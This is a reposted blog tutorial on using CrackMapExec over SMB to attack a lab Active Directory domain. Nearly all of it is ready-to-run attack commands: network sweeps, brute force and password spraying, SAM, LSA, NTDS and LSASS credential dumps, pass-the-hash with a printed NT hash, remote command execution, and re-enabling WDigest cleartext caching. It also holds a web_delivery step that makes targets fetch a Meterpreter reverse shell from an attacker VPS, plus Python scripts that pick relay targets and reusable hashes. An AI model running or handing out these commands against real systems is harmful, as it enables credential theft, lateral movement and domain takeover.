The most detailed CrackMapExec SMB tutorial you will find anywhere

admin, 2024-02-05 14:14:05

First of All

Lab environment:

# Environment
[DC  Windows Server 2008  192.168.174.146]
Hostname: WIN-VAH4GJKI11G
User: Administrator   Password: Thr33!@#

[Windows 7  192.168.174.149]
Domain user: NPC/three   Password: Thr33#3
Local user: three

CrackMapExec version:

Version : 5.4.1
Codename: Indestructible G0thm0g

Basic Usage

# CME attempts to execute commands in the following order:
1. wmiexec: executes commands via WMI
2. atexec: executes commands by scheduling a task with the Windows Task Scheduler
3. smbexec: executes commands by creating and running a service
Protocols

# Version 5.4.1
# Protocols
python cme -h
-----
optional arguments:
  -h, --help            show this help message and exit
  -t THREADS            set how many concurrent threads to use (default: 100)
  --timeout TIMEOUT     max timeout in seconds of each thread (default: None)
  --jitter INTERVAL     sets a random delay between each connection (default: None)
  --darrell             give Darrell a hand
  --verbose             enable verbose output

protocols:
  available protocols

  {ftp,ldap,mssql,rdp,smb,ssh,winrm}
    ftp                 own stuff using FTP
    ldap                own stuff using LDAP
    mssql               own stuff using MSSQL
    rdp                 own stuff using RDP
    smb                 own stuff using SMB
    ssh                 own stuff using SSH
    winrm               own stuff using WINRM

Optional Arguments

optional arguments:
  -h, --help            show this help message and exit
  -id CRED_ID [CRED_ID ...]
                        database credential ID(s) to use for authentication
  -u USERNAME [USERNAME ...]
                        username(s) or file(s) containing usernames
  -p PASSWORD [PASSWORD ...]
                        password(s) or file(s) containing passwords
  -k, --kerberos        Use Kerberos authentication
  --use-kcache          Use Kerberos authentication from ccache file (KRB5CCNAME)
  --export EXPORT [EXPORT ...]
                        Export result into a file, probably buggy
  --aesKey AESKEY [AESKEY ...]
                        AES key to use for Kerberos Authentication (128 or 256 bits)
  --kdcHost KDCHOST     FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  --gfail-limit LIMIT   max number of global failed login attempts
  --ufail-limit LIMIT   max number of failed login attempts per username
  --fail-limit LIMIT    max number of failed login attempts per host
  -M MODULE, --module MODULE
                        module to use
  -o MODULE_OPTION [MODULE_OPTION ...]
                        module options
  -L, --list-modules    list available modules
  --options             display module options
  --server {https,http}
                        use the selected server (default: https)
  --server-host HOST    IP to bind the server to (default: 0.0.0.0)
  --server-port PORT    start the server on the specified port
  --connectback-host CHOST
                        IP for the remote system to connect back to (default: same as server-host)
  -H HASH [HASH ...], --hash HASH [HASH ...]
                        NTLM hash(es) or file(s) containing NTLM hashes
  --no-bruteforce       No spray when using file for username and password (user1 => password1, user2 => password2)
  --continue-on-success
                        continues authentication attempts even after successes
SMB Arguments

# SMB optional arguments:
  -d DOMAIN             domain to authenticate to
  --local-auth          authenticate locally to each target
  --port {139,445}      SMB port (default: 445)
  --share SHARE         specify a share (default: C$)
  --smb-server-port SMB_SERVER_PORT
                        specify a server port for SMB
  --gen-relay-list OUTPUT_FILE
                        outputs all hosts that do not require SMB signing to the specified file
  --smb-timeout SMB_TIMEOUT
                        SMB connection timeout, default 2 seconds
  --laps [LAPS]         LAPS authentication

Credential Gathering

Credential Gathering:
  Options for gathering credentials

  --sam                 dump SAM hashes from target systems
  --lsa                 dump LSA secrets from target systems
  --ntds [{drsuapi,vss}]
                        dump the NTDS.dit from target DCs using the specified method (default: drsuapi)
  --enabled             Only dump enabled targets from DC
  --user USERNTDS       Dump selected user from DC

# --local-auth          authenticate locally to each target (local SAM account, not a domain account)
python cme smb 192.168.174.149 -u three -p "npc@three" -X whoami --local-auth
Mapping/Enumeration

Mapping/Enumeration:
  Options for Mapping/Enumerating

  --shares              enumerate shares and access
  --sessions            enumerate active sessions
  --disks               enumerate disks
  --loggedon-users-filter LOGGEDON_USERS_FILTER
                        only search for specific user, works with regex
  --loggedon-users      enumerate logged on users
  --users [USER]        enumerate domain users, if a user is specified then only its information is queried
  --groups [GROUP]      enumerate domain groups, if a group is specified then its members are enumerated
  --computers [COMPUTER]
                        enumerate computer accounts
  --local-groups [GROUP]
                        enumerate local groups, if a group is specified then its members are enumerated
  --pass-pol            dump password policy
  --rid-brute [MAX_RID]
                        enumerate users by bruteforcing RIDs (default: 4000)
  --wmi QUERY           issues the specified WMI query
  --wmi-namespace NAMESPACE
                        WMI namespace (default: root\cimv2)
Spidering

Spidering:
  Options for spidering shares

  --spider SHARE        share to spider
  --spider-folder FOLDER
                        folder to spider (default: root share directory)
  --content             enable file content searching
  --exclude-dirs DIR_LIST
                        directories to exclude from spidering
  --pattern PATTERN [PATTERN ...]
                        pattern(s) to search for in folders, filenames and file content
  --regex REGEX [REGEX ...]
                        regex(s) to search for in folders, filenames and file content
  --depth DEPTH         max spider recursion depth (default: infinity & beyond)
  --only-files          only spider files
Files (upload/download)

Files:
  Options for put and get remote files

  --put-file FILE FILE  Put a local file into remote target, ex: whoami.txt \Windows\Temp\whoami.txt
  --get-file FILE FILE  Get a remote file, ex: \Windows\Temp\whoami.txt whoami.txt
Command Execution

Command Execution:
  Options for executing commands

  --exec-method {smbexec,wmiexec,mmcexec,atexec}
                        method to execute the command. Ignored if in MSSQL mode (default: wmiexec)
  --codec CODEC         Set encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run chcp.com at the target,
                        map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec
                        and the corresponding codec
  --force-ps32          force the PowerShell command to run in a 32-bit process
  --no-output           do not retrieve command output
  -x COMMAND            execute the specified command
  -X PS_COMMAND         execute the specified PowerShell command

PowerShell Obfuscation

Powershell Obfuscation:
  Options for PowerShell script obfuscation

  --obfs                Obfuscate PowerShell scripts
  --amsi-bypass FILE    File with a custom AMSI bypass
  --clear-obfscripts    Clear all cached obfuscated PowerShell scripts
Lateral Movement on Active Directory

Enumeration

# Enumeration: Discovering IPs
# Unauthenticated: every host that answers on 445 prints a banner line with its hostname, domain, OS and whether SMB signing is required
python cme smb 192.168.174.0/24
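The banner lines that the sweep above prints are worth parsing rather than reading by eye: the `(signing:False)` field is exactly what `--gen-relay-list` keys on, and `(Pwn3d!)` on a login line marks a host where the credential is a local administrator. The following is an added example, not code from the post or from CrackMapExec. It assumes CME's one-event-per-line layout (protocol, IP, port, hostname, status tag, message) and the `(name:..) (domain:..) (signing:..) (SMBv1:..)` banner fields; the sample lines are constructed for the lab hosts in the post (the Windows 7 hostname `WIN7` is assumed), not captured from a run.

```python
"""Parse CrackMapExec SMB output into a host table and a relay list.

Added example for this post; it is not code from the post or from
CrackMapExec. It assumes CME's one-event-per-line text layout
(protocol, ip, port, hostname, [tag], message) and the
(name:..) (domain:..) (signing:..) (SMBv1:..) banner fields. The sample
lines below are constructed for the lab hosts in the post, not captured.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample output in CME's layout (hostname WIN7 is assumed).
SAMPLE_OUTPUT = """\
SMB         192.168.174.146 445    WIN-VAH4GJKI11G  [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:WIN-VAH4GJKI11G) (domain:NPC) (signing:True) (SMBv1:True)
SMB         192.168.174.149 445    WIN7             [*] Windows 7 Ultimate 7601 Service Pack 1 x64 (name:WIN7) (domain:NPC) (signing:False) (SMBv1:True)
SMB         192.168.174.146 445    WIN-VAH4GJKI11G  [+] NPC\\Administrator:Thr33!@# (Pwn3d!)
SMB         192.168.174.149 445    WIN7             [+] NPC\\Administrator:Thr33!@# (Pwn3d!)
SMB         192.168.174.149 445    WIN7             [-] NPC\\sky:Thr33!@# STATUS_LOGON_FAILURE
"""

LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[(?P<tag>[*+!-])\]\s+(?P<msg>.*)$"
)
FIELD_RE = re.compile(r"\((?P<key>name|domain|signing|SMBv1):(?P<val>[^)]*)\)")


@dataclass
class Host:
    ip: str
    hostname: str
    os: str = ""
    domain: str = ""
    signing: Optional[bool] = None    # False => SMB relay candidate
    smbv1: Optional[bool] = None
    valid_creds: List[str] = field(default_factory=list)
    admin: bool = False               # CME printed (Pwn3d!) for this host


def parse_cme_output(text: str) -> Dict[str, Host]:
    hosts: Dict[str, Host] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                  # module output, blank lines, etc.
        h = hosts.setdefault(m["ip"], Host(ip=m["ip"], hostname=m["host"]))
        tag, msg = m["tag"], m["msg"]
        if tag == "*":                # banner: OS string, then key:value fields
            first = FIELD_RE.search(msg)
            h.os = msg[: first.start()].strip() if first else msg.strip()
            fields = dict(FIELD_RE.findall(msg))
            h.domain = fields.get("domain", h.domain)
            if "signing" in fields:
                h.signing = fields["signing"] == "True"
            if "SMBv1" in fields:
                h.smbv1 = fields["SMBv1"] == "True"
        elif tag == "+":              # successful logon: DOMAIN\user:secret [(Pwn3d!)]
            h.valid_creds.append(msg.replace("(Pwn3d!)", "").strip())
            h.admin = h.admin or "(Pwn3d!)" in msg
    return hosts


def relay_targets(hosts: Dict[str, Host]) -> List[str]:
    """Hosts that accept unsigned SMB: the same set --gen-relay-list writes out."""
    return sorted(h.ip for h in hosts.values() if h.signing is False)


def admin_hosts(hosts: Dict[str, Host]) -> List[str]:
    """Hosts where the supplied credential is a local administrator."""
    return sorted(h.ip for h in hosts.values() if h.admin)


if __name__ == "__main__":
    table = parse_cme_output(SAMPLE_OUTPUT)
    for h in table.values():
        print(f"{h.ip:16} {h.hostname:16} signing={h.signing} smbv1={h.smbv1} admin={h.admin}  {h.os}")
    print("relay targets:", relay_targets(table))
    print("admin on:", admin_hosts(table))
```

Feed it the saved output of a real sweep (`python cme smb 192.168.174.0/24 ... | tee sweep.log`) and the relay list falls out without a second run with `--gen-relay-list`; the `[-]` lines are deliberately ignored so failed logons never pollute the credential table.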

# Passwords are single-quoted from here on: in bash, `!` inside double quotes triggers history expansion
# and `$` starts a parameter expansion, so "Thr33!@#" or "Thr33$4" may not reach cme intact.

# Enumeration: Users
# --users [USER] enumerate domain users
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --users

# Enumeration: Groups
# --groups [GROUP] enumerate domain groups
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --groups

# Enumeration: Shares
# --shares enumerate shares and access
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --shares

# Enumeration: Sessions
# --sessions enumerate active sessions
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --sessions

# Enumeration: Text files
# --spider SHARE share to spider
# --pattern PATTERN [PATTERN ...] pattern(s) to search for in folders, filenames and file content
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --spider 'C$' --pattern txt

# Enumeration: Log files
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --spider 'C$' --pattern log
Bruteforce

# Bruteforce: Username (several usernames against one password, across the whole /24)
python cme smb 192.168.174.0/24 -u "sky" "Administrator" -p 'Thr33!@#'

# Bruteforce: Password (one username against several passwords)
python cme smb 192.168.174.0/24 -u "Administrator" -p "password1" "password2" 'Thr33!@#'

# Bruteforce: Dictionary attack
# By default every username in user.txt is tried against every password in pass.txt;
# add --no-bruteforce to pair them line by line (user1 => password1, user2 => password2).
# Check the lockout threshold first (--pass-pol) or cap attempts with --ufail-limit.
python cme smb 192.168.174.149 -u user.txt -p pass.txt

Credential Dumping

# Credential Dumping: SAM
# --sam dump SAM hashes from target systems (local accounts; output is user:rid:lmhash:nthash:::)
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --sam

# Credential Dumping: LSA
# --lsa dump LSA secrets from target systems
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --lsa

# Credential Dumping: NTDS (DRSUAPI)
# --ntds [{drsuapi,vss}] dump the NTDS.dit from target DCs using the specified method (default: drsuapi)
# drsuapi replicates the hashes over RPC like a DC would; vss takes a shadow copy of NTDS.dit and parses it
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --ntds drsuapi
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --ntds vss

# Credential Dumping: lsassy
# Module: lsassy (the old mimikatz module was removed; lsassy dumps LSASS and parses it remotely)
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -M lsassy
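What you do with a `--sam` or `--ntds` dump afterwards is mostly triage: which accounts share an NT hash (same password, so one pass-the-hash credential opens several accounts), which have an empty password, which still have an LM hash stored, and which are machine accounts. The following is an added example, not code from the post or from CrackMapExec. It assumes the pwdump-style line format CME prints (`user:rid:lmhash:nthash:::`, with a `DOMAIN\` prefix on NTDS lines). The sample dump is constructed; only the Administrator NT hash is the value quoted in the post.

```python
"""Triage a CME --sam / --ntds dump for pass-the-hash candidates.

Added example for this post; not code from the post or from CrackMapExec.
Input is the pwdump-style line format CME prints: user:rid:lmhash:nthash:::
(NTDS lines carry a DOMAIN\\ prefix). The sample dump below is constructed;
only the Administrator NT hash is the one quoted in the post.
"""
import re
from collections import defaultdict
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # "no LM hash stored" marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed sample dump (SAM lines plus NTDS lines mixed, as from two runs).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:24f5d7aa6e13f9560f0eda7ff909a605:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NPC\\three:1104:aad3b435b51404eeaad3b435b51404ee:24f5d7aa6e13f9560f0eda7ff909a605:::
NPC\\sky:1105:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
NPC\\svc_backup:1106:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
WIN-VAH4GJKI11G$:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I
)


def parse_dump(text: str) -> List[dict]:
    """Return one dict per hash line; anything else (banners, status lines) is skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return entries


def triage(entries: List[dict]) -> Dict[str, object]:
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        # same NT hash == same password: one -H value works for all of them
        "reused": {nt: users for nt, users in by_nt.items()
                   if len(users) > 1 and nt != EMPTY_NT},
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        # an LM hash is still stored: crackable offline in minutes
        "lm_hash_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "machine_accounts": [e["user"] for e in entries if e["user"].endswith("$")],
        "rid_500": [e["user"] for e in entries if e["rid"] == 500],
    }


def pth_args(entry: dict) -> List[str]:
    """Arguments for `cme smb <target> -u USER -H NTHASH` (the post passes the NT hash alone)."""
    user = entry["user"].split("\\")[-1]    # strip DOMAIN\ prefix; pass -d separately
    return ["-u", user, "-H", entry["nt"]]


if __name__ == "__main__":
    entries = parse_dump(SAMPLE_DUMP)
    report = triage(entries)
    for key, value in report.items():
        print(f"{key:17} {value}")
    for e in entries:
        print(" ".join(pth_args(e)))
```

In the constructed dump, Administrator and `NPC\three` share an NT hash, so the single hash the post replays with `-H` would authenticate as either account; Guest's hash is the empty-password value and `svc_backup` still has an LM hash, both worth reporting before anyone spends time cracking.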

Pass the Hash

# -H takes the NT hash dumped above in place of the password; no cracking needed
python cme smb 192.168.174.146 -u "Administrator" -H "24f5d7aa6e13f9560f0eda7ff909a605"

Password Spraying

# --rid-brute [MAX_RID] enumerate users by bruteforcing RIDs (default: 4000)
# 'Thr33$4' must be single-quoted: inside double quotes bash replaces $4 with an (empty) positional parameter
python cme smb 192.168.174.146 -u user.txt -p 'Thr33$4' --rid-brute

# --continue-on-success continues authentication attempts even after successes
# (without it CME stops at the first valid login, which is not what you want when spraying a user list)
python cme smb 192.168.174.146 -u user.txt -p 'Thr33$4' --continue-on-success

Remote Command Execution

# Remote Command Execution
# -x COMMAND      execute the specified command
# --codec CODEC   Set encoding used (codec) from the target's output
# The lab targets use the Chinese code page (chcp reports 936), which maps to the Python codec gbk;
# without --codec gbk any non-ASCII output from the target comes back mangled.
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -x quser --codec gbk
python cme smb 192.168.174.146 -u "Administrator" -H "24f5d7aa6e13f9560f0eda7ff909a605" -x quser

# -X PS_COMMAND   execute the specified PowerShell command
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -X whoami
python cme smb 192.168.174.146 -u "Administrator" -H "24f5d7aa6e13f9560f0eda7ff909a605" -X whoami

# Remote Command Execution: atexec
# --exec-method {smbexec,wmiexec,mmcexec,atexec}  method to execute the command. Ignored if in MSSQL mode (default: wmiexec)
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -x "net user Administrator /domain" --exec-method atexec --codec gbk

# Remote Command Execution: wmiexec
# --wmi QUERY     issues the specified WMI query
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -x "net user Administrator /domain" --exec-method wmiexec --codec gbk
# $PSVersionTable must be single-quoted, otherwise bash expands it to an empty string before cme ever sees it
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -X '$PSVersionTable' --exec-method wmiexec --codec gbk
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' --wmi "select Name from Win32_UserAccount"

Modules

# View all the modules
python cme smb -L
-----
[*] bh_owned                  Set pwned computer as owned in Bloodhound
[*] dfscoerce                 Module to check if the DC is vulnerable to DFSCoerce, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc                   Drop a searchConnector-ms file on each writable share
[*] empire_exec               Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_avproducts           Gathers information on all endpoint protection solutions installed on the remote host(s) via WMI
[*] enum_dns                  Uses WMI to dump DNS from an AD DNS Server
[*] get_netconnections        Uses WMI to query network connections.
[*] gpp_autologin             Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password              Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] handlekatz                Get lsass dump using handlekatz64 and parse the result with pypykatz
[*] hash_spider               Dump lsass recursively from a given hash using BH to find local admins
[*] impersonate               List and impersonate tokens to run command as locally logged on users
[*] install_elevated          Checks for AlwaysInstallElevated
[*] ioxidresolver             This module helps you to identify hosts that have additional active interfaces
[*] keepass_discover          Search for KeePass-related files and process.
[*] keepass_trigger           Set up a malicious KeePass trigger to export the database in cleartext.
[*] lsassy                    Dump lsass and parse the result remotely with lsassy
[*] masky                     Remotely dump domain user credentials via an ADCS and a KDC
[*] met_inject                Downloads the Meterpreter stager and injects it into memory
[*] ms17-010                  MS17-010, /!\ not tested outside home lab
[*] nanodump                  Get lsass dump using nanodump and parse the result with pypykatz
[*] nopac                     Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] ntlmv1                    Detect if lmcompatibilitylevel on the target is set to 0 or 1
[*] petitpotam                Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] procdump                  Get lsass dump using procdump64 and parse the result with pypykatz
[*] rdp                       Enables/Disables RDP
[*] runasppl                  Check if the registry value RunAsPPL is set or not
[*] scuffy                    Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce              Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky                    Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
[*] spider_plus               List files on the target server (excluding `DIR` directories and `EXT` extensions) and save them to the `OUTPUT` directory if they are smaller than `SIZE`
[*] spooler                   Detect if print spooler is enabled or not
[*] teams_localdb             Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
[*] test_connection           Pings a host
[*] uac                       Checks UAC status
[*] wdigest                   Creates/Deletes the "UseLogonCredential" registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery              Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
[*] webdav                    Checks whether the WebClient service is running on the target
[*] wireless                  Get key of all wireless interfaces
[*] zerologon                 Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472

lsassy (replaces mimikatz)

# Module: lsassy (the old mimikatz module was removed; lsassy is the replacement)
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -M lsassy

wdigest

# Module: wdigest
# ACTION=enable sets UseLogonCredential=1 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest,
# so that WDigest keeps cleartext credentials in LSASS memory again (Windows 8.1 / 2012 R2 and later stopped doing so).
# Only logons that happen after the change are affected, so wait for a new logon before dumping with lsassy;
# ACTION=disable deletes the value again when you are done.
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -M wdigest -o ACTION=enable

enum_dns

# Module: enum_dns (dumps the AD-integrated DNS zones over WMI; needs the DC or a DNS server as target)
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -M enum_dns

web_delivery (works with msf)

# Module: web_delivery
# Meterpreter session
# 1. msfconsole (target 2 is the PowerShell handler, which matches the PowerShell one-liner the module runs)
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost <YOUR_VPS_IP>
set lport 8888
set srvhost 0.0.0.0
set srvport 6666
exploit

# 2. cme (URL is the one msf prints after `exploit`; the path component is generated per run)
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -M web_delivery -o URL=http://<YOUR_VPS_IP>:6666/6XBQfG

# 3. Meterpreter shell arrives in msfconsole

zerologon

# Module: zerologon (only checks whether the DC is vulnerable to CVE-2020-1472; it does not exploit it)
python cme smb 192.168.174.146 -u "Administrator" -p 'Thr33!@#' -M zerologon
python cme smb 192.168.174.146 -u "Administrator" -H "24f5d7aa6e13f9560f0eda7ff909a605" -M zerologon


Originally published on the WeChat official account 黑伞安全: The most detailed CrackMapExec SMB tutorial you will find anywhere

Posted by admin on 2024-02-05 14:14:05. Please keep this link when reposting (CN-SEC, with thanks to the original author): https://cn-sec.com/archives/2460310.html
